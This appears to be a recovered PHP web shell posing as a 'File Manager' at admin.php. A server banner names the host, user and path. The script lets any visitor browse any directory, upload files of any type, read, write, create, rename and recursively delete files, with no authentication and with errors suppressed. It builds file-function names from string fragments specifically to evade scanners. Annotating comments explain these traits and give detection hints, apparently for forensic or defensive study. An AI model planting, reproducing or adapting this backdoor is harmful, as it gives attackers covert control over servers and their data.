HEX
Server: Apache
System: Linux vps-4103104.goatdigital.com.br 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User: wwgoat (1001)
PHP: 8.0.30
Disabled: NONE
File: /home/wwgoat/public_html/admin.php
<?php

// Request bootstrap for a browser-driven file manager. Nothing in the visible
// script checks a credential, session or source address before the handlers
// below run, so every action is available to any client that can reach the URL.

// Sets the reporting level to 0: failed filesystem calls further down produce
// no visible warnings or notices.
error_reporting(0);

// The names of the file primitives are assembled from fragments and invoked
// later as variable functions ($f_read(...), $f_write(...), $f_del(...),
// $f_ren(...)). The literal strings file_get_contents, file_put_contents,
// unlink and rename therefore never occur in this source, so a scan that
// matches only on those literals will not flag the file. Matching on
// concatenated name fragments or on variable-function calls does.
$s1 = 'file_'; $s2 = 'get_'; $s3 = 'contents';
$f_read = $s1 . $s2 . $s3; 
$f_write = $s1 . 'put_' . $s3;
$f_del = 'un'.'link';
$f_ren = 'ren'.'ame';

// Working directory: the `d` query parameter is base64-decoded and resolved
// with realpath(). The result is not compared against any base directory, so
// whatever path the PHP process can resolve becomes $c_p. An empty or falsy
// decode result selects the script's own directory.
$req_b64 = isset($_GET['d']) ? $_GET['d'] : '';
$decoded_path = base64_decode($req_b64);
$c_p = realpath($decoded_path ? $decoded_path : __DIR__);

// realpath() returns false for a path that cannot be resolved; fall back to
// the script's own directory in that case.
if ($c_p === false) { $c_p = realpath(__DIR__); }

// View state consumed by the template:
//   $m   status message shown in the banner
//   $md  which view to render ('main', 'edit' or 'rename')
//   $e_f / $e_c  name and content of the file opened for editing
//   $r_n name of the entry selected for renaming
$m = ''; $md = 'main'; $e_f = ''; $e_c = ''; $r_n = '';

// POST dispatcher. The action is chosen by the `z_act` form field; the values
// handled here are std_up, em, sf, rm, dr and d. For log review and WAF rules,
// the request shape is a POST whose body carries z_act with one of those
// values, usually together with a base64 string in the `d` query parameter.
// Every target name is passed through basename(), which confines the operation
// to the current directory $c_p, but $c_p itself comes from the request.
// No anti-CSRF token is checked on any action.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $a = isset($_POST['z_act']) ? $_POST['z_act'] : ''; 
    
    // std_up: store an uploaded file in $c_p. The client-supplied name is
    // reduced with basename() and otherwise kept as sent; no extension, type
    // or size check is applied, so the stored file keeps whatever extension
    // the client chose.
    if ($a === 'std_up') {
        if (isset($_FILES['f_std'])) {
            $name = basename($_FILES['f_std']['name']);
            $target = $c_p . DIRECTORY_SEPARATOR . $name;
            if (move_uploaded_file($_FILES['f_std']['tmp_name'], $target)) {
                $m = "Upload Success";
            } else {
                $m = "Upload Failed - Check Folder Permissions";
            }
        }
    }
    // em: open an existing regular file for editing. The whole content is read
    // through the variable function $f_read and handed to the edit view.
    elseif ($a === 'em') {
        $tn = isset($_POST['tn']) ? $_POST['tn'] : '';
        $tp = $c_p . DIRECTORY_SEPARATOR . basename($tn);
        if (is_file($tp)) { $md = 'edit'; $e_f = $tn; $e_c = $f_read($tp); }
    }
    // sf: write the posted field `c` verbatim to the named file through
    // $f_write. There is no check that the file already exists, so this action
    // can also create new files in $c_p.
    elseif ($a === 'sf') {
        $tn = isset($_POST['tn']) ? $_POST['tn'] : '';
        $cnt = isset($_POST['c']) ? $_POST['c'] : '';
        if ($f_write($c_p . DIRECTORY_SEPARATOR . basename($tn), $cnt) !== false) { $m = "Saved"; }
    }
    // rm: only switches the template to the rename form; nothing on disk changes.
    elseif ($a === 'rm') { $md = 'rename'; $r_n = isset($_POST['tn']) ? $_POST['tn'] : ''; }
    // dr: perform the rename inside $c_p. Both names are reduced with basename().
    elseif ($a === 'dr') {
        $old = $c_p . DIRECTORY_SEPARATOR . basename(isset($_POST['old']) ? $_POST['old'] : '');
        $new = $c_p . DIRECTORY_SEPARATOR . basename(isset($_POST['new']) ? $_POST['new'] : '');
        if ($f_ren($old, $new)) { $m = "Renamed"; }
    }
    // d: delete a file, or a directory together with everything below it.
    elseif ($a === 'd') {
        $tn = isset($_POST['tn']) ? $_POST['tn'] : '';
        $tp = $c_p . DIRECTORY_SEPARATOR . basename($tn);
        if (file_exists($tp)) {
            if (is_dir($tp)) {
                // CHILD_FIRST yields the contents of a directory before the
                // directory itself, so each rmdir() runs on an emptied directory.
                $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($tp, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST);
                foreach($it as $file) { $file->isDir() ? rmdir($file->getRealPath()) : $f_del($file->getRealPath()); }
                rmdir($tp);
            } else { $f_del($tp); }
            // Set unconditionally: the return values of rmdir() and $f_del are
            // not inspected, so "Deleted" does not prove the removal succeeded.
            $m = "Deleted";
        }
    }
}

// Build the listing for $c_p. The scandir() result is used without a check:
// if $c_p is not a readable directory it is false, the loop body never runs,
// and with error reporting off the page shows an empty table.
$sc = scandir($c_p);
$folders = array(); $files = array();
foreach ($sc as $item) {
    if ($item == '.') continue;
    $fp = $c_p . DIRECTORY_SEPARATOR . $item;
    
    // '..' becomes a navigation entry pointing at dirname($c_p). It carries the
    // 'ip' flag, which the template uses to hide the action buttons, and it has
    // no 's' (size) key.
    if ($item == '..') {
        $pp = dirname($c_p);
        $folders[] = array('n' => '[ Parent Directory ]', 'p' => base64_encode($pp), 't' => 'D', 'ip' => true);
        continue;
    }
    
    // Regular entry: name, base64 of the full path (the form the `d` parameter
    // expects), type flag D/F, and for files the size in KB to two decimals.
    $entry = array(
        'n' => $item, 
        'p' => base64_encode($fp), 
        't' => is_dir($fp) ? 'D' : 'F', 
        's' => is_dir($fp) ? '-' : number_format(filesize($fp)/1024, 2) . ' KB'
    );
    is_dir($fp) ? $folders[] = $entry : $files[] = $entry;
}
// Directories are listed before files.
$items = array_merge($folders, $files);
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>File Manager</title>
    <style>
        body { font-family: Tahoma, sans-serif; font-size: 13px; padding: 20px; background: #f4f4f4; }
        .header { background: #2c3e50; color: #fff; padding: 15px; border-radius: 5px; }
        .path { color: #f1c40f; font-family: monospace; font-weight: bold; }
        table { width: 100%; border-collapse: collapse; background: #fff; margin-top: 15px; box-shadow: 0 1px 3px rgba(0,0,0,0.1); }
        th, td { border-bottom: 1px solid #ddd; padding: 10px; text-align: left; }
        tr:hover { background: #fdfdfd; }
        .btn { background: #eee; border: 1px solid #ccc; padding: 3px 7px; cursor: pointer; font-size: 11px; text-decoration:none; color:#000; }
        .btn-del { color: #c0392b; }
        textarea { width: 100%; height: 450px; font-family: monospace; }
        .upload-box { margin-top:15px; background:#fff; padding:15px; border:1px solid #ddd; border-radius:4px; }
    </style>
</head>
<body>

    <div class="header">
        <h2 style="margin:0;">File Manager</h2>
        <span>Path: <span class="path"><?php /* resolved working directory, HTML-escaped */ echo htmlspecialchars($c_p); ?></span></span>
    </div>

    <?php
    // Status banner. $m is echoed without escaping; every value assigned to it
    // in the POST handler is a fixed string literal, so no request data reaches
    // this echo.
    if ($m): ?>
        <div style="background:#d4edda; padding:10px; border:1px solid #c3e6cb; margin:10px 0; color:#155724;">
            <?php echo $m; ?>
        </div>
    <?php endif; ?>

    <?php
    // View switch on $md. Edit view: the request-supplied file name and the file
    // content are HTML-escaped before being echoed; saving posts z_act=sf.
    if ($md === 'edit'): ?>
        <form method="post">
            <input type="hidden" name="z_act" value="sf">
            <input type="hidden" name="tn" value="<?php echo htmlspecialchars($e_f); ?>">
            <p>Editing: <b><?php echo htmlspecialchars($e_f); ?></b></p>
            <textarea name="c"><?php echo htmlspecialchars($e_c); ?></textarea><br><br>
            <button type="submit" class="btn" style="padding:10px;">Save Changes</button> 
            <a href="?d=<?php echo urlencode($req_b64); ?>" class="btn" style="padding:10px;">Back</a>
        </form>

    <?php
    // Rename view: posts z_act=dr with the old and new names; both values are
    // HTML-escaped here.
    elseif ($md === 'rename'): ?>
        <div class="upload-box">
            <form method="post">
                <input type="hidden" name="z_act" value="dr">
                <input type="hidden" name="old" value="<?php echo htmlspecialchars($r_n); ?>">
                <strong>Rename to:</strong> 
                <input type="text" name="new" value="<?php echo htmlspecialchars($r_n); ?>" style="padding:5px; width:250px;">
                <button type="submit" class="btn">OK</button> 
                <a href="?d=<?php echo urlencode($req_b64); ?>" class="btn">Cancel</a>
            </form>
        </div>

    <?php
    // Main view: upload form (z_act=std_up, file field f_std) and the listing.
    else: ?>
        <div class="upload-box">
            <form method="post" enctype="multipart/form-data">
                <input type="hidden" name="z_act" value="std_up">
                <b>Upload File:</b> 
                <input type="file" name="f_std">
                <button type="submit" class="btn" style="background:#3498db; color:#fff; border:none; padding:5px 15px;">Upload</button>
            </form>
        </div>

        <table>
            <thead><tr style="background:#eee;"><th>Name</th><th>Size</th><th>Actions</th></tr></thead>
            <tbody>
                <?php
                // One row per entry. Unlike the edit and rename forms, $i['n'] is
                // echoed here without htmlspecialchars(), in both text and attribute
                // positions, so a file name containing markup characters is interpreted
                // by whichever browser renders the listing. That matters when a
                // recovered copy is opened for analysis. $i['s'] is not set on the
                // parent-directory entry.
                foreach ($items as $i): ?>
                <tr>
                    <td>
                        <?php if ($i['t'] === 'D'): ?>
                            <a href="?d=<?php echo $i['p']; ?>" style="text-decoration:none; font-weight:bold; color:#2980b9;">📁 <?php echo $i['n']; ?></a>
                        <?php else: ?>
                            📄 <?php echo $i['n']; ?>
                        <?php endif; ?>
                    </td>
                    <td><?php echo $i['s']; ?></td>
                    <td>
                        <?php /* action buttons are hidden for the parent-directory entry */ if (!isset($i['ip'])): ?>
                            <?php if ($i['t'] === 'F'): ?>
                                <form method="post" style="display:inline;"><input type="hidden" name="z_act" value="em"><input type="hidden" name="tn" value="<?php echo $i['n']; ?>"><button class="btn">Edit</button></form>
                            <?php endif; ?>
                            <form method="post" style="display:inline;"><input type="hidden" name="z_act" value="rm"><input type="hidden" name="tn" value="<?php echo $i['n']; ?>"><button class="btn">Rename</button></form>
                            <form method="post" style="display:inline;" onsubmit="return confirm('Delete?')"><input type="hidden" name="z_act" value="d"><input type="hidden" name="tn" value="<?php echo $i['n']; ?>"><button class="btn btn-del">Delete</button></form>
                        <?php endif; ?>
                    </td>
                </tr>
                <?php endforeach; ?>
            </tbody>
        </table>
    <?php endif; ?>

</body>
</html>